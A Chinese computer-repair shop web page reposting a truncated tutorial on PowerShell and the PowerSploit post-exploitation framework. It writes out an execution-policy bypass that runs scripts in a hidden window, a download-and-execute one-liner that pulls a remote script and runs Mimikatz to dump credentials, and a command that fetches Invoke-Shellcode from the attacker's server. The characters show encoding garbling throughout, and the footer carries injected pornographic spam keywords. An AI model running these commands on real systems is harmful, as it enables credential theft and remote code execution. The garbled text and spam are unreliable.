錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見(jiàn)故障
錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
[安全]解析在內(nèi)網(wǎng)Powersploit滲透中的使用

作者: 佚名  日期:2017-04-14 07:35:07   來(lái)源: 本站整理

一.Powershell

我們先來(lái)說(shuō)說(shuō)powershell,PowerShell 是運(yùn)行在 Windows上實(shí)現(xiàn)系統(tǒng)和應(yīng)用程序管理自動(dòng)化的命令行腳本環(huán)境。你可以把它看成是命令行提示符 cmd.exe 的擴(kuò)充,或是顛覆。Powershell需要.NET環(huán)境的支持,同時(shí)支持.NET對(duì)象。其可讀性,易用性,可以位居當(dāng)前所有 shell 之首。

這是別人說(shuō)的,不過(guò)稍微研究下覺(jué)得,哇塞,這東西真的挺牛的,除了語(yǔ)法麻煩以外,剩下都挺好,不過(guò)語(yǔ)法麻煩讓我們這種英文不好的人怎么玩啊

當(dāng)前 PowerShell 有五個(gè)版本,分別為 1.0,2.0,3.0,4.0,5.0

當(dāng)時(shí)看別人的文章都說(shuō)是有四個(gè)版本,但是我打開(kāi)windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來(lái)看看他的基本命令:

 新建目錄 New-Item whitecellclub -ItemType Directory

 新建文件 New-Item light.txt -ItemType File

 刪除目錄 Remove-Item whitecellclub

 顯示文本內(nèi)容 Get-Content light.txt

 設(shè)置文本內(nèi)容 Set-Content light.txt -Value “i love light so much”

 追加內(nèi)容 Add-Content light.txt -Value “but i love you more”

 清除內(nèi)容 Clear-Content light.txt

看看吧,什么感覺(jué),你還喜歡他么?

不過(guò)好在,微軟也想到了這個(gè)問(wèn)題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說(shuō)一下,我們?cè)趺纯次覀僷owershell的版本,

Get-Host

這個(gè)是虛擬機(jī)的win7,所以是2.0的版本

powershell還有一些比較叼的用法:

本地權(quán)限繞過(guò)執(zhí)行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隱藏權(quán)限繞過(guò)執(zhí)行腳本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1

直接用IEX下載遠(yuǎn)程的PS1腳本回來(lái)權(quán)限繞過(guò)執(zhí)行

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"

我們可以來(lái)試一下:

這個(gè)命令是可以看到我們的版本的

完美繞過(guò)。╬s:這里說(shuō)一下,ps1結(jié)尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因?yàn)槲乙膊粫?huì)寫(xiě)這種腳本)

二. Powersploit

介紹完了,我們開(kāi)始我們的正題吧 Powersploit在內(nèi)網(wǎng)滲透中的使用

powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關(guān)模塊和功能。

github地址: https://github.com/mattifestation/PowerSploit

這里才是重點(diǎn),我們開(kāi)始吧:

首先,我在我本機(jī)上下載這個(gè)腳本文件

ps:我本機(jī)用的是ubuntu,所以我這里就用ubuntu代替kali的操作

下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠(yuǎn)程下載,然后啟動(dòng)apache

service apache2 start

然后我們?cè)L問(wèn)我們的127.0.0.1  保證我們可以訪問(wèn)的到

他的目錄就跟metasploit一樣,分工明確

CodeExecution 在目標(biāo)主機(jī)執(zhí)行代碼

ScriptModification 在目標(biāo)主機(jī)上創(chuàng)建或修改腳本

Persistence 后門(mén)腳本(持久性控制)

AntivirusBypass 發(fā)現(xiàn)殺軟查殺特征

Exfiltration 目標(biāo)主機(jī)上的信息搜集工具

Mayhem 藍(lán)屏等破壞性腳本

Recon 以目標(biāo)主機(jī)為跳板進(jìn)行內(nèi)網(wǎng)信息偵查

(1). Invoke-Shellcode

我們使用 Invoke-Shellcode

Invoke-Shellcode的作用:將shellcode插入您選擇的進(jìn)程ID或本地PowerShell中。

Invoke-Shellcode配合上metasploit,可以達(dá)到意想不到的效果

現(xiàn)在主機(jī)上下載我們的腳本(當(dāng)然,你也可以直接從github上去下載,也可以從我們本機(jī)下載)

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")


熱門(mén)文章
  • 機(jī)械革命S1 PRO-02 開(kāi)機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫(xiě)次數(shù)和判...
  • IIS 8 開(kāi)啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門(mén)禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開(kāi)機(jī)界面...
  • 常見(jiàn)打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門(mén)維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門(mén)服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門(mén)維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤(pán)刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 精品无码人妻一区二区三区| 无码专区国产无套粉嫩白浆内射 | 亚洲中文字幕无码mv| 精品人无码一区二区三区| 亚洲精品无码少妇30P| 国产成人AV片无码免费| 永久免费AV无码国产网站| 日韩人妻无码一区二区三区综合部| 无码国产伦一区二区三区视频| 日韩电影无码A不卡| 免费A级毛片无码A∨免费 | 久久精品九九热无码免贵| 精品久久久久久久无码久中文字幕| 亚洲AV无码一区二区三区DV | 熟妇人妻系列av无码一区二区| 啊灬啊别停灬用力啊无码视频| 久久青草亚洲AV无码麻豆 | 性色av无码免费一区二区三区| 亚洲AV无码成人精品区在线观看 | 人妻无码一区二区视频| 国产精品无码免费播放| 精品人妻系列无码一区二区三区| 亚洲av日韩av无码| 成在人线av无码免费高潮喷水| YY111111少妇无码理论片| 日韩精品中文字幕无码专区| 中文字幕无码亚洲欧洲日韩| 久久无码国产专区精品| 中文字幕无码高清晰| 久久久久无码精品国产不卡 | 孕妇特级毛片WW无码内射| 亚洲中文字幕无码一区| 在线a亚洲v天堂网2019无码| 国产成人无码AⅤ片在线观看| 亚洲国产精品无码久久久久久曰| 一本一道中文字幕无码东京热| 永久免费无码日韩视频| 中文字幕久无码免费久久| 东京热人妻无码人av| 久久久国产精品无码免费专区 | 亚洲人成影院在线无码观看 |